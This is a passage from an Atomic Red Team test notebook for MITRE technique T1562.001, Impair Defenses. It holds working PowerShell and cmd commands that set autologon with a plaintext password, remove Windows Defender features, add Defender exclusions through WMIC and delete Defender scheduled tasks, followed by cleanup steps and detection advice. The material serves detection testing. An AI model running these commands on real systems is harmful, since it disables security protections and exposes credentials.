reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /f >nul 2>&1
reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /f >nul 2>&1
reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName /f >nul 2>&1
reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 33 -Cleanup

### Atomic Test #34 - LockBit Black - Disable Privacy Settings Experience Using Registry -PowershellLockBit Black - Disable Privacy Settings Experience Using Registry
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
New-ItemProperty "HKCU:\Software\Policies\Microsoft\Windows\OOBE" -Name DisablePrivacyExperience -PropertyType DWord -Value 0 -Force
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 34

#### Cleanup: 
```powershell
Remove-ItemProperty "HKCU:\Software\Policies\Microsoft\Windows\OOBE" -Name DisablePrivacyExperience -Force -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 34 -Cleanup

### Atomic Test #35 - Lockbit Black - Use Registry Editor to turn on automatic logon -PowershellLockbit Black - Use Registry Editor to turn on automatic logon
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name AutoAdminLogon -PropertyType DWord -Value 1 -Force
New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultUserName -Value Administrator -Force
New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultDomainName -Value contoso.com -Force
New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword  -Value password1 -Force
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 35

#### Cleanup: 
```powershell
Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name AutoAdminLogon -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultUserName -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultDomainName -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword -Force -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 35 -Cleanup

### Atomic Test #36 - Disable Windows Defender with PwSh Disable-WindowsOptionalFeatureThe following Atomic will attempt to disable Windows-Defender using the built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool. 
Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images.
A successful execution will not standard-out any details. Remove the quiet switch if verbosity is needed.
This method will remove Defender and it's packages.
Reference: https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-Gui" -NoRestart -ErrorAction Ignore
Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-Features" -NoRestart -ErrorAction Ignore
Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender" -NoRestart -ErrorAction Ignore
Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-ApplicationGuard" -NoRestart -ErrorAction Ignore```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 36

### Atomic Test #37 - WMIC Tamper with Windows Defender Evade Scanning FolderThe following Atomic will attempt to exclude a folder within Defender leveraging WMI
Reference: https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"ATOMICREDTEAM\"
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 37

#### Cleanup: 
```cmd
wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Remove ExclusionPath=\"ATOMICREDTEAM\"
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 37 -Cleanup

### Atomic Test #38 - Delete Windows Defender Scheduled Tasks
The following atomic test will delete the Windows Defender scheduled tasks.

[Reference](https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/)

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `command_prompt`!
##### Description: The Windows Defender scheduled tasks must be backed up first

##### Check Prereq Commands:
```cmd
IF EXIST "%temp%\Windows_Defender_Scheduled_Scan.xml" ( EXIT 0 ) ELSE ( EXIT 1 )

```
##### Get Prereq Commands:
```cmd
schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" > "%temp%\Windows_Defender_Scheduled_Scan.xml"
schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" > "%temp%\Windows_Defender_Cleanup.xml"
schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" > "%temp%\Windows_Defender_Verification.xml"
schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" > "%temp%\Windows_Defender_Cache_Maintenance.xml"

```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 38 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
IF EXIST "%temp%\Windows_Defender_Scheduled_Scan.xml" ( schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f )
IF EXIST "%temp%\Windows_Defender_Cleanup.xml" ( schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f )
IF EXIST "%temp%\Windows_Defender_Verification.xml" ( schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" /f )
IF EXIST "%temp%\Windows_Defender_Cache_Maintenance.xml" ( schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f )
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 38

#### Cleanup: 
```cmd
schtasks /create /xml "%temp%\Windows_Defender_Scheduled_Scan.xml" /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
schtasks /create /xml "%temp%\Windows_Defender_Cleanup.xml" /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
schtasks /create /xml "%temp%\Windows_Defender_Verification.xml" /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
schtasks /create /xml "%temp%\Windows_Defender_Cache_Maintenance.xml" /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 38 -Cleanup

## Detection
Monitor processes and command-line arguments to see if security tools/services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Monitoring for changes to other known features used by deployed security tools may also expose malicious activity.

Lack of expected log events may be suspicious.